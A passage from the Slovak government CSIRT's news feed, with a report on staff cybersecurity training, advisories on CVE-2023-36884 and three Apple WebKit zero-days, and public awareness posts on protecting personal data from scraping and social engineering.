<p>Vládna jednotka CSIRT okrem riešení kybernetických bezpečnostných incidentov poskytuje aj preventívne aktivity a&nbsp;penetračné testovanie pre subjekty v&nbsp;gescii sektorového CSIRTu. Práve o penetračnom testovaní webových aplikácií mal prednášku Adam Žilla, s dôrazom na vyhľadávanie a zneužívanie zraniteľností. Adam Žilla je etický hacker a&nbsp;bývalý člen VJ CSIRT. Penetračné testovanie má súvis s etickýcm hackovaním, o ktorom prednášal etický hacker a&nbsp;tvorca blogu Netvel.sk, Matej Šipkovský. Prednáška zahŕňala simuláciu útokov, modus operandi a ich protiopatrenia na zariadeniach spoločnosti Cisco. Členovia technického oddelenia VJ CSIRT získali skúsenosti s používaním nástrojov ako Sysmon a FTK Imager pre detekovanie pokročilých hrozieb, zber dát a forenznú analýzu, vďaka prednáškam od Jana Linharta a bývalej členky VJ CSIRT Evky Markovej. Ján Linhart sa venuje téme Threat Hunting a&nbsp;SOC v&nbsp;spoločnosti Binary Confidence a&nbsp;Evka Marková je študentkou doktorandského štúdia na UPJŠ v&nbsp;Košiciach, a&nbsp;zároveň forenznou analytičkou v&nbsp;spoločnosti ESET. Nadobudnuté znalosti umožňujú bezpečnostným analytikom získať viac dát o logovaní a priebehu incidentu z infikovaného disku. Martin Pavelka, študent doktorandského štúdia&nbsp; na FIIT STU, a Ján Laštinec, vyučujúci na FIIT STU, poskytli informácie o novinkách v oblasti bezpečnosti operačných systémov Windows a Linux vrátane OPRA oprávnení, autentifikácie, firewallu a implementácie adresárových služieb Active Directory. Ako nakonfigurovať firewall, vytvoriť pravidlá pre anomálie v sieti a o detekcií a zabráneniu šírenia útoku pomocou EDR, firewallu a programu Suricata IDS nám povedali Stanislav Stančík, Jakub Koštial a Ján Skalný. Stanislav Stančík a&nbsp;Jakub Koštial sú neoddeliteľnou súčasťou spoločnosti Binary Confidence, Ján Skalný je nezávislý bezpečnostný výskumník SK-CERT. Boris Mittelmann sa posledných 10 rokov venuje ochrane, zálohovaniu a obnove dát o&nbsp;čom mal aj prednášku. &nbsp;Aktuálne pracuje na pozícii Senior Sytem Engineer pre región CEE v spoločnosti Veeam Software. Alexander Valach, doktorand na FIIT STU a člen VJ CSIRT, ktorý sa zameriava na bezpečnostný monitoring, analýzu údajov a&nbsp;automatizáciu, mal prednášku zameranú na bezpečnosť CISCO zariadení a&nbsp;úvod do kybernetickej bezpečnosti. Prednášku o využití bezpečnostného monitoringu pomocou nástroja SIEM pri riešení incidentov mal Radovan Andráš, SOC analytik&nbsp;spoločnosti Binary Confidence. </p>



<p>Okrem prednášok mali účastníci príležitosť riešiť modelový incident v systéme ELK STACK a zúčastniť sa cvičení Capture the Flag na otestovanie svojich zručností v simulovanom kybernetickom útoku, kde ho museli zvládnuť a splniť určité požiadavky pre úspešné ukončenie školenia CyberOps. Cvičenie si pre nich pripravili Radovan Andráš a Alexander Valach.</p>



<p>Všetci zúčastnení členovia VJ CSIRT školenie úspešne zvládli a nadobudli ďalšie poznatky v oblasti boja proti hybridným hrozbám. S historicky najvyšším medziročným nárastom kybernetických útokov za rok 2022 je pravidelná edukácia členov VJ CSIRT nevyhnutnou podmienkou pre zachovanie efektivity ich práce.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="465" height="350" src="/wp-content/uploads/2024/02/image.png" alt="" class="wp-image-362" style="width:389px;height:auto"/></figure>



<figure class="wp-block-image size-full is-resized"><img decoding="async" src=":8000/wp-content/uploads/2023/11/image-14.png" alt="" class="wp-image-3855" style="width:389px;height:auto"/></figure>



<figure class="wp-block-image size-full is-resized"><img decoding="async" src=":8000/wp-content/uploads/2023/11/image-16.png" alt="" class="wp-image-3857"/></figure>
]]></content:encoded>
					
					<wfw:commentRss>/posts/361/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zero-day RCE zraniteľnosť v Microsoft Windows a Office</title>
		<link>/posts/917</link>
					<comments>/posts/917#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 13 Dec 2023 08:28:52 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<guid isPermaLink="false">/?p=917</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft opravila v&#160;rámci svojho júlového balíka Patch Tuesday aktívne zneužívanú zraniteľnosť systémov Windows a&#160;balíka Office, umožňujúcu vzdialené vykonávanie kódu....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft opravila v&nbsp;rámci svojho júlového balíka Patch Tuesday aktívne zneužívanú zraniteľnosť systémov Windows a&nbsp;balíka Office, umožňujúcu vzdialené vykonávanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p>Microsoft Office 2019 for 32-bit editions<br>Microsoft Office 2019 for 64-bit editions<br>Microsoft Office LTSC 2021 for 32-bit editions<br>Microsoft Office LTSC 2021 for 64-bit editions<br>Microsoft Word 2013 Service Pack 1 (32-bit editions)<br>Microsoft Word 2013 Service Pack 1 (64-bit editions)<br>Microsoft Word 2016 (32-bit edition)<br>Microsoft Word 2016 (64-bit edition)<br>Windows 10 for 32-bit Systems<br>Windows 10 for x64-based Systems<br>Windows 10 Version 1607 for 32-bit Systems<br>Windows 10 Version 1607 for x64-based Systems<br>Windows 10 Version 1809 for 32-bit Systems<br>Windows 10 Version 1809 for ARM64-based Systems<br>Windows 10 Version 1809 for x64-based Systems<br>Windows 10 Version 21H2 for 32-bit Systems<br>Windows 10 Version 21H2 for ARM64-based Systems<br>Windows 10 Version 21H2 for x64-based Systems<br>Windows 10 Version 22H2 for 32-bit Systems<br>Windows 10 Version 22H2 for ARM64-based Systems<br>Windows 10 Version 22H2 for x64-based Systems<br>Windows 11 version 21H2 for ARM64-based Systems<br>Windows 11 version 21H2 for x64-based Systems<br>Windows 11 Version 22H2 for ARM64-based Systems<br>Windows 11 Version 22H2 for x64-based Systems<br>Windows Server 2008 for 32-bit Systems Service Pack 2<br>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)<br>Windows Server 2008 for x64-based Systems Service Pack 2<br>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)<br>Windows Server 2008 R2 for x64-based Systems Service Pack 1<br>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)<br>Windows Server 2012<br>Windows Server 2012 (Server Core installation)<br>Windows Server 2012 R2<br>Windows Server 2012 R2 (Server Core installation)<br>Windows Server 2016<br>Windows Server 2016 (Server Core installation)<br>Windows Server 2019<br>Windows Server 2019 (Server Core installation)<br>Windows Server 2022<br>Windows Server 2022 (Server Core installation)</p>



<p><strong>Opis činnosti:</strong></p>



<p><em>CVE-2023-36884 (CVSSv3.1 8,3)</em></p>



<p>Spoločnosť Microsoft opravila v&nbsp;rámci svojho júlového balíka Patch Tuesday vysoko závažnú <strong>aktívne zneužívanú</strong> zraniteľnosť, umožňujúcu vzdielane vykonávať kód. Zraniteľnosť útočníci zneužívajú na <strong>nasadenie ransomvéru a&nbsp;špionážne aktivity pomocou škodlivých dokumentov MS Office</strong>. Pre úspešný útok musí útočník presvedčiť obeť, aby interagovala so škodlivým súborom. Zraniteľnosť sa nachádza v&nbsp;komponente <strong>HTML</strong> v&nbsp;systémoch <strong>Windows</strong> a&nbsp;balíku<strong> Office</strong>.</p>



<p>Pozorované boli cielené útoky proruskej skupiny Storm-0978 v&nbsp;rámci spear-phishingových kampaní najmä na organizácie spojené s&nbsp;pomocou Ukrajine.</p>



<p><strong>Závažnosť zraniteľnosti: </strong>Vysoká</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Vzdialené vykonávanie kódu</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná inštalácia júlového balíka PatchTuesday.</strong></p>



<p><strong>Ak inštalácia aktualizácie nie je možná, Microsoft vydal odporúčania pre </strong><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884" target="_blank" rel="noreferrer noopener">mitigovanie zraniteľnosti</a><strong> použitím MS Defender for Office, blokovaním vytvárania detských procesov pre aplikácie MS Office, či vytvorením kľúča v registroch.</strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://blog.cyble.com/2023/07/12/microsoft-zero-day-vulnerability-cve-2023-36884-being-actively-exploited/" target="_blank" rel="noreferrer noopener">https://blog.cyble.com/2023/07/12/microsoft-zero-day-vulnerability-cve-2023-36884-being-actively-exploited/</a></p>



<p><a href="https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/" target="_blank" rel="noreferrer noopener">https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884" target="_blank" rel="noreferrer noopener">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/917/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Apple rapídna bezpečnostná odpoveď na nové zero-day zraniteľnosti</title>
		<link>/posts/912</link>
					<comments>/posts/912#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 13 Dec 2023 08:23:48 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<guid isPermaLink="false">/?p=912</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/apple_logo_1988-e1732265458470.webp" alt="" /></p>Bezpečnostní výskumníci objavili tri zero-day zraniteľnosti zariadení spoločnosti Apple, ktoré útočníci používajú na sledovanie a&#160;zbieranie citlivých údajov zo zariadení iPhone,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/apple_logo_1988-e1732265458470.webp" alt="" /></p>
<p><strong>Bezpečnostní výskumníci objavili tri zero-day zraniteľnosti zariadení spoločnosti Apple, ktoré útočníci používajú na sledovanie a&nbsp;zbieranie citlivých údajov zo zariadení iPhone, Mac a iPad. Spoločnosť Apple preto vydáva novú aktualizáciu zabezpečenia svojich zariadení formou nedávno spustenej služby rapídna bezpečnostná odpoveď (RSR).&nbsp;</strong></p>



<p><strong>Zraniteľné systémy:</strong><strong></strong></p>



<p>Zraniteľnosť ovplyvňuje celý rad produktov, vrátane mnohých, ktoré spoločnosť Apple, označuje ako produkty na konci svojej technickej životnosti, menovite sú to tieto zariadenia.</p>



<p>iPhone 6s ( všetky modely ), iPhone 7 ( všetky modely ), iPhone SE ( 1. generácia ), iPhone 8 a novšie</p>



<p>iPod touch ( 7. generácia ),</p>



<p>iPad Pro ( všetky modely ), iPad Air 3. generácia a novšia, iPad 5. generácia a novšia, iPad Air 2, iPad mini ( 4. generácia ), iPad mini 5. generácia a&nbsp;novšie,</p>



<p>Mac počítače s&nbsp;operačným systémom MacOS Big Sur, Monterey a Ventura</p>



<p>Apple Watch Series 4 a novšie</p>



<p>Apple TV 4K ( všetky modely ) a Apple TV HD</p>



<p><strong>Opis činnosti:</strong></p>



<p><em>CVE-2023-32409</em></p>



<p>Prvá zraniteľnosť v renderovacom jadre WebKit, umožňuje potenciálnemu útočníkovi sa dostať z&nbsp;karantény (sandbox) takzvaného Web Content, a&nbsp;inštalovať škodlivý kód ako napríklad spyware.</p>



<p><em>CVE-2023-28204</em></p>



<p>Táto zraniteľnosť umožňuje čítanie mimo hraníc a mohla by umožniť vzdialenému útočníkovi získať citlivé informácie.</p>



<p><em>CVE-2023-32373</em><em></em></p>



<p>Ďalšou zraniteľnosťou vo WebKit-e môže útočník vzdialene vykonať kód pri spracovaní dát, alebo návšteve špeciálne vytvoreného škodlivého webu. Jedná sa o&nbsp;chybu umožňujúcu použitie dealokovanej časti pamäte.</p>



<p>Spoločnosť Apple nezverejnila žiadne ďalšie technické podrobnosti k&nbsp;bezpečnostným problémom a objaveným hrozbám. Prvú spomínanú zraniteľnosť&nbsp;<em>CVE-2023-32409</em>&nbsp;objavili Clément Lecigne zo skupiny Google pre analýzu hrozieb a Donncha Ó Cearbhaill z bezpečnostného laboratória Amnesty International. Povaha chýb naznačuje, že už mohli byť zneužité napríklad na šírenie spywaru štátom sponzorovanými útočníkmi, ktorí takto sledujú rôzne ciele ako disidentov, aktivistov za ľudské práva a&nbsp;podobne.</p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Vykonávanie kódu</li>



<li>Únik a&nbsp;zneužitie citlivých dát</li>



<li>Eskalácia oprávnení</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť Apple od mája tohto roku spúšťa službu rýchlej bezpečnostnej reakcie (v skratke RSR), ktorá ako názov naznačuje, je malá záplata, ktorá rýchlejšie opravuje aktívne zraniteľnosti zneužívané pri útokoch.</p>



<p>Odporúčame bezodkladnú aktualizáciu systémov macOS Ventura na verziu 13.4, iOS a iPadOS na verziu 15.7.6 a 16.5, tvOS na 16.5, watchOS na 9.5 a&nbsp;prehliadača Safari na verziu 16.5.</p>



<p>Ak zariadenie pripojené na internet samo neupozorní na dostupnú neodkladnú rýchlu bezpečnostnú záplatu, odporúčame skontrolovať jej dostupnosť nasledovne:</p>



<p>Na zariadeniach iPhone alebo iPad: Prejdite do Nastavenia &gt; Všeobecné &gt; Aktualizácia softvéru &gt; Automatické aktualizácie, potom sa uistite, že sú zapnuté &gt; Bezpečnostné odpovede a systémové súbory.</p>



<p>Pre počítače s MacOSx: Vyberte ponuku Apple &gt; Nastavenia systému. Kliknite na položku Všeobecné na bočnom paneli a potom na položku &gt; Aktualizácia softvéru, ktorá je vpravo. Kliknite na tlačidlo Zobraziť podrobnosti vedľa automatických aktualizácií a potom sa uistite, že je zapnutá možnosť Inštalovať bezpečnostné odpovede a systémové súbory.</p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.bleepingcomputer.com/news/apple/apple-fixes-three-new-zero-days-exploited-to-hack-iphones-macs/">https://www.bleepingcomputer.com/news/apple/apple-fixes-three-new-zero-days-exploited-to-hack-iphones-macs/</a></p>



<p><a href="https://thehackernews.com/2023/05/webkit-under-attack-apple-issues.html">https://thehackernews.com/2023/05/webkit-under-attack-apple-issues.html</a></p>



<p><a href="https://appleinsider.com/articles/23/05/18/apples-latest-ios-ipados-macos-updates-fixed-an-actively-used-exploit">https://appleinsider.com/articles/23/05/18/apples-latest-ios-ipados-macos-updates-fixed-an-actively-used-exploit</a></p>



<p><a href="https://support.apple.com/en-us/HT213758">https://support.apple.com/en-us/HT213758</a></p>



<p><a href="https://support.apple.com/en-us/HT213757">https://support.apple.com/en-us/HT213757</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/912/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Buď múdrejší ako hacker- osobné údaje #4</title>
		<link>/posts/931</link>
					<comments>/posts/931#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 30 Nov 2023 08:40:20 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[#BeSmarterThanAHacker]]></category>
		<category><![CDATA[#Odporucania]]></category>
		<category><![CDATA[CSIRTacik]]></category>
		<guid isPermaLink="false">/?p=931</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/05/image-1024x1024-1.png" alt="" /></p>Október je mesiacom kybernetickej bezpečnosti, kedy sa zvyšuje povedomie o dôležitosti bezpečnosti a ochrane osobných údajov. Osobnými údajmi sa rozumejú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/05/image-1024x1024-1.png" alt="" /></p>
<p>Október je mesiacom kybernetickej bezpečnosti, kedy sa zvyšuje povedomie o dôležitosti bezpečnosti a ochrane osobných údajov. Osobnými údajmi sa rozumejú všetky informácie, ktoré možno použiť na identifikáciu jednotlivca, napríklad meno, adresa, telefónne číslo, e-mailová adresa a&nbsp;<a href="https://www.csirt.gov.sk/posts/3658.html?csrt=802227918087936526" target="_blank" rel="noreferrer noopener">ďalšie</a> (týždeň 1). Kyberútočnící používajú na zhromažďovanie osobných údajov rôzne metódy vrátane phishingu, malvéru, sociálneho inžinierstva a <a href="https://www.csirt.gov.sk/posts/3684.html?csrt=802227918087936526" target="_blank" rel="noreferrer noopener">ďalších</a> (týždeň 2). Keď získajú prístup k osobným údajom, môžu ich použiť na krádež identity, finančné podvody a <a href="https://www.csirt.gov.sk/posts/3718.html?csrt=802227918087936526" target="_blank" rel="noreferrer noopener">iné nekalé činnosti</a> (týždeň 3). Preto je veľmi dôležité chrániť osobné údaje pred kybernetickými hrozbami.</p>



<p><strong><em>Pripravili sme pre Vás desatoro odporúčaní, ktoré vám pomôžu ochrániť vaše osobné údaje:</em></strong><strong><em></em></strong></p>



<ol style="list-style-type:1">
<li><strong><em>Nevyžiadané správy</em></strong>: Buďte ostražití pri prijímaní e-mailov, telefónnych hovorov alebo správ od neznámych zdrojov, najmä ak tieto zdroje žiadajú o osobné alebo citlivé informácie. V prípade pochybností kontaktujte príslušnú osobu, organizáciu alebo ich overte. Pomocou <a href="https://hunter.io/email-verifier" target="_blank" rel="noreferrer noopener">online nástroja</a>, dokážete overiť dôveryhodnosť emailovej adresy.</li>



<li><strong><em>Identita</em></strong>: Dajte si pozor na zdieľanie citlivých fotografií, dokladov alebo informácií na internete. Útočník ich dokáže zneužiť pre vytvorenie falošného profilu a&nbsp;tým získať dôveryhodnosť.&nbsp; Pomocou nástrojov <a href="https://www.google.com/" target="_blank" rel="noreferrer noopener">Google</a>, <a href="https://www.bing.com/" target="_blank" rel="noreferrer noopener">Bing</a>, <a href="https://yandex.com/images/" target="_blank" rel="noreferrer noopener">Yandex</a> alebo oficiálnych stránok dokážete zistiť identitu z&nbsp;fotografie a základných informácií.</li>



<li><strong><em>Naliehanie</em></strong>: Buďte opatrní voči správam, ktoré vytvárajú pocit naliehavosti alebo strachu. Útočníci často využívajú taktiky na to, aby ľudí manipulovali do rýchlych a nepremyslených rozhodnutí. Viac o&nbsp;<a href="https://www.csirt.gov.sk/socialne-inzinierstvo.html" target="_blank" rel="noreferrer noopener">technikách sociálneho inžinierstva</a>.</li>



<li><strong><em>Sociálne siete</em></strong>: Upravte svoje profily na sociálnych sieťach na súkromné a dávajte pozor na informácie, ktoré zdieľate online. Dokážete tak predísť <a href="https://www.csirt.gov.sk/posts/3684.html?csrt=802227918087936526" target="_blank" rel="noreferrer noopener">získaniu osobných dát útočníkom</a>.</li>



<li><strong><em>Aktualizácia a antivírus</em></strong>: Pravidelné aktualizácie softvéru a používanie antivírusového softvéru sú kľúčovými pre ochranu pred malvérom a inými typmi útokov. Pokiaľ nemáte zakúpený antivírus, odporúčame mať aspoň zapnutý a&nbsp;nakonfigurovaný Microsoft Defender spoločne s firewallom.</li>



<li><strong><em>Edukácia</em></strong>: Buďte dobre informovaní o&nbsp;závažných zraniteľnostiach, taktikách útočníkov a naučte sa ich rozpoznávať a predchádzať im. Poskytovanie vzdelávania zamestnancom je kľúčové pre ochranu celej organizácie. Napríklad pravidelné sledovanie zraniteľností ,ktoré sú zverejňované na stránke <a href="https://www.csirt.gov.sk/index.html?csrt=802227918087936526" target="_blank" rel="noreferrer noopener">VJ CSIRT</a>.</li>



<li><strong><em>2FA</em></strong>: Povoliť dvojfaktorovú autentifikáciu (2FA) pre svoje účty všade, keď je to možné. Týmto spôsobom sa pridáva dodatočná úroveň zabezpečenia Vášho konta. Najlepšie <a href="https://www.pcmag.com/picks/the-best-authenticator-apps" target="_blank" rel="noreferrer noopener">aplikácie pre autentifikáciu</a>.</li>



<li><strong><em>Heslá: </em></strong>Používajte silné a jedinečné heslá pre všetky svoje účty, najmä pre administratívne a redakčné účty. Zvážte použitie <a href="https://www.pcmag.com/picks/the-best-password-managers" target="_blank" rel="noreferrer noopener">manažéra hesiel</a> na bezpečné generovanie a uchovávanie hesiel.</li>



<li><strong><em>Zálohovanie</em></strong>: Pravidelne zálohujte svoje dáta na bezpečné miesto, ako je externý pevný disk alebo cloudová úložná služba. Toto Vám môže pomôcť obnoviť vaše údaje v prípade ransomware útoku alebo inej straty.</li>



<li><strong><em>VPN a&nbsp;verejné WIFI: </em></strong>Pri používaní verejných sietí Wi-Fi sa odporúča používať <a href="https://www.webhostingcentrum.sk/vpn/" target="_blank" rel="noreferrer noopener">sieť VPN</a> na ochranu vášho súkromia a bezpečnosti. Sieť VPN vytvára bezpečné a šifrované pripojenie k&nbsp;sieti.&nbsp; Vyhnite sa používaniu verejných Wi-Fi sietí na prenos citlivých informácií, ako sú heslá, bankové údaje a osobné údaje.</li>
</ol>



<p>Používateľ sociálnych sietí by mal obmedziť množstvo zdieľaných osobných informácií. Je dôležité byť si týchto rizík vedomý a prijať kroky na svoju ochranu. Týmito opatreniami môžete chrániť samých seba a&nbsp;svojich najbližších pred útočníkmi, ktorí sa snažia zneužiť Vaše osobné údaje na útok proti Vám. Dodržiavanie bezpečnostných odporúčaní pomôže minimalizovať riziko, že sa stanete obeťou útokov. <strong><em><u>Vždy pamätajte, že prevencia je najlepšou ochranou pred kybernetickými hrozbami !</u></em></strong> Ako prevenciu môžete použiť aj <a href="https://haveibeenpwned.com/" target="_blank" rel="noreferrer noopener">online nástroj</a> na vyhľadávanie Vašich prihlasovacích údajov v&nbsp;online databázach uniknutých dát. Alebo pravidelne využívať <a href="https://www.virustotal.com/gui/home/search" target="_blank" rel="noreferrer noopener">stránku</a> na skenovanie súborov, URL, domén, <a href="https://centralops.net/co/" target="_blank" rel="noreferrer noopener">overovanie zdrojov</a> pre získanie viacerých informácií. &nbsp;</p>



<p>Pripravili sme si pre Vás krátky phishingový test, kde si môžete na praktických príkladoch overiť svoje znalosti. Phishingový test: <a rel="noreferrer noopener" href="https://www.csirt.gov.sk/archiv/osvedcene-postupy/navody-a-odporucania/phishingovy-test-871.html?csrt=6113910499060114075" target="_blank">https://www.csirt.gov.sk/archiv/osvedcene-postupy/navody-a-odporucania/phishingovy-test-871.html?csrt=6113910499060114075</a></p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1024" height="1024" src="/wp-content/uploads/2024/05/image-1024x1024-1.png" alt="" class="wp-image-932"/></figure>
]]></content:encoded>
					
					<wfw:commentRss>/posts/931/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Buď múdrejší ako hacker- osobné údaje #3</title>
		<link>/posts/927</link>
					<comments>/posts/927#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 20 Nov 2023 08:38:44 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[#BeSmarterThanAHacker]]></category>
		<category><![CDATA[CSIRTacik]]></category>
		<guid isPermaLink="false">/?p=927</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/05/image-1-1024x1024-1.png" alt="" /></p>Zneužitie osobných údajov je stále častejším problémom v&#160;bežnom živote ľudí. Útočníci sa snažia využiť rôzne sofistikované metódy, vrátane web scrapingu...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/05/image-1-1024x1024-1.png" alt="" /></p>
<p><strong>Zneužitie osobných údajov je stále častejším problémom v&nbsp;bežnom živote ľudí. Útočníci sa snažia využiť rôzne sofistikované metódy, vrátane web scrapingu a sociálneho inžinierstva, na získanie citlivých údajov obetí a ich následné zneužitie. Tieto údaje môžu zahŕňať osobné informácie, telefónne čísla, bankové údaje a oveľa viac. V nasledujúcom texte sa pozrieme na to, ako by útočník mohol získať a zneužiť tieto údaje v rôznych situáciách.</strong></p>



<p><strong><em>Telefón + Banková karta:</em></strong></p>



<p>Útočník by mohol pomocou kombinácie web scrapingu a sociálneho inžinierstva získať osobné údaje, vrátane telefónneho čísla a údajov z bankovej karty. Existujú automatizované nástroje na web scraping, ktoré prehľadávajú verejne dostupné online zdroje (sociálne siete, fóra, web stránky..) a&nbsp;zbierajú z&nbsp;nich osobné údaje.</p>



<p>Na základe získaných dát dokáže útočník využiť taktiky sociálneho inžinierstva za účelom nadobudnutia konkrétnych údajov, ako sú telefónne číslo, číslo bankovej karty a&nbsp;podobne. Po získaní telefónneho čísla a údajov z bankovej karty by útočník mohol tieto informácie zneužiť na neoprávnené transakcie alebo finančné podvody. V&nbsp;prípade, že získa prístup k&nbsp;bankovým údajom, môže sa pokúsiť vykonať transakcie na účte obete a&nbsp;následne obeť kontaktovať telefonicky s cieľom získať ďalšie informácie, ktoré mu pomôžu s finančnými podvodmi.</p>



<p><strong><em>Krádež účtu:</em></strong></p>



<p>Pomocou metódy web scrapingu dokáže útočník získať meno a priezvisko, dátum narodenia, miesto bydliska, emailovú adresu a podobne. Na základe zberu týchto osobných údajov, dokáže útočník vytvoriť &nbsp;falošný profil alebo emailovú správu a pokúsi sa získať ďalšie citlivé informácie, ako sú heslá alebo odpovede na otázky k obnoveniu hesla. Tým získa úplnú kontrolu nad účtom alebo zablokuje Váš prístup do Vášho profilu.</p>



<p><strong><em>Krádež identity:</em></strong></p>



<p>Každá zverejnená fotografia môže obsahovať metadáta, ktoré poskytujú informácie o mieste, kde bola fotografia zachytená. Útočník môže zneužiť tieto informácie na vytvorenie falošnej identity a dokumentovať presný pohyb obete. S&nbsp;týmito informáciami o&nbsp;polohe môže útočník vytvoriť vymyslený príbeh alebo identitu a&nbsp;tým zvýšiť dôveryhodnosť svojho príbehu.</p>



<p><strong><em>Vydieranie a kyberšikana:</em></strong></p>



<p>Útočník môže získať osobné údaje obete, vrátane jej fotografií a&nbsp;polohy miest, ktoré navštívila. Úspešné získanie informácií umožňuje vydierať alebo šikanovať obeť, napríklad vyhrážkami zverejnením citlivých fotografií alebo informácií na sociálnych sieťach.</p>



<p><strong><em>Útok na firmy</em></strong><strong><em>/organizácie:</em></strong></p>



<p>Útočník môže vyhľadávať informácie o zamestnancoch a organizácii, vrátane ich fotografií na verejných profiloch (napríklad platforma LinkedIn). Tieto informácie dokáže zneužiť na vytvorenie falošnej identity, ktorú môže zneužiť na infiltráciu do organizácie za účelom získania citlivých vnútropodnikových informácií a špionáže.</p>



<p><strong><em>Vlámanie:</em></strong></p>



<p>Útočník by mohol vyhľadávať verejne dostupné informácie o bydlisku alebo pomocou GPS metadát z&nbsp;uverejnených fotografií na sociálnych sieťach. Môžu to byť informácie o adrese, veľkosti domu, plánovaných dovolenkách, naplánovanom programe v online kalendároch a iné. Na základe týchto informácií by útočník mohol vytvoriť falošný príbeh alebo vytvoriť dôveryhodný scenár, ktorý by mohol zneužiť pri plánovaní vlámania. Dokáže zistiť neprítomnosť majiteľov, čo by mu mohlo poskytnúť príležitosť na vlámanie.</p>



<p><strong><em>Kombinácia osobných údajov:</em></strong></p>



<p>Útočník môže zhromažďovať rôzne verejné údaje o obeti z rôznych zdrojov. Následne môže využiť tieto informácie na vytvorenie komplexného profilu obete a použiť ho na sofistikované útoky.</p>



<p><strong><em><u>Časté príklady:</u></em></strong></p>



<p>Veľmi častým príkladom môže byť telefonická komunikácia, kde sa útočník vydáva za príslušníka policajného zboru alebo analytika IT oddelenia v&nbsp;banke, na pošte a&nbsp;podobne. Primárnym nástrojom útočníka je sociálne inžinierstvo, kedy sa Vás snaží presvedčiť o&nbsp;zdieľaní citlivých údajov, autentifikačných dát, prípadne potvrdení notifikácie. <strong><u>Nikdy tieto informácie neprezrádzajte</u></strong><strong><u>!</u></strong> Banka, pošta, kuriér alebo iné oficiálne inštitúcie nepotrebujú vedieť autentifikačné dáta, heslá alebo údaje z&nbsp;bankovej karty.</p>



<p>Ďalším príkladom môže byť nezodpovedné správanie zo strany obetí, napríklad keď sa pochvália novou bankovou kartou na sociálnych sieťach. <strong><u>Nikdy nezverejňujte fotografie svojich bankových údajov!</u></strong> Na obrázku môžeme vidieť zverejnenie prednej strany debetnej karty a&nbsp;po následnej interakcií ľudí v&nbsp;komentároch aj prezradenie CVV/CVC kódu.</p>



<figure class="wp-block-image size-full"><img decoding="async" src=":8000/wp-content/uploads/2023/10/image-7.png" alt="" class="wp-image-3719"/></figure>



<p><strong>Buďte obozretní pri zdieľaní osobných údajov online a chráňte svoje informácie</strong><strong>!</strong> Dodržiavajte bezpečnostné opatrenia, aby Ste minimalizovali pravdepodobnosť zneužitia osobných údajov útočníkmi. Silné heslá, dvojfaktorová autentifikácia a opatrnosť pri zdieľaní osobných informácií online sú nevyhnutné pre zachovanie Vašej digitálnej bezpečnosti.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1024" height="1024" src="/wp-content/uploads/2024/05/image-1-1024x1024-1.png" alt="" class="wp-image-928"/></figure>
]]></content:encoded>
					
					<wfw:commentRss>/posts/927/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Buď múdrejší ako hacker- osobné údaje #2</title>
		<link>/posts/922</link>
					<comments>/posts/922#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 12 Oct 2023 08:34:55 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[#BeSmarterThanAHacker]]></category>
		<category><![CDATA[CSIRTacik]]></category>
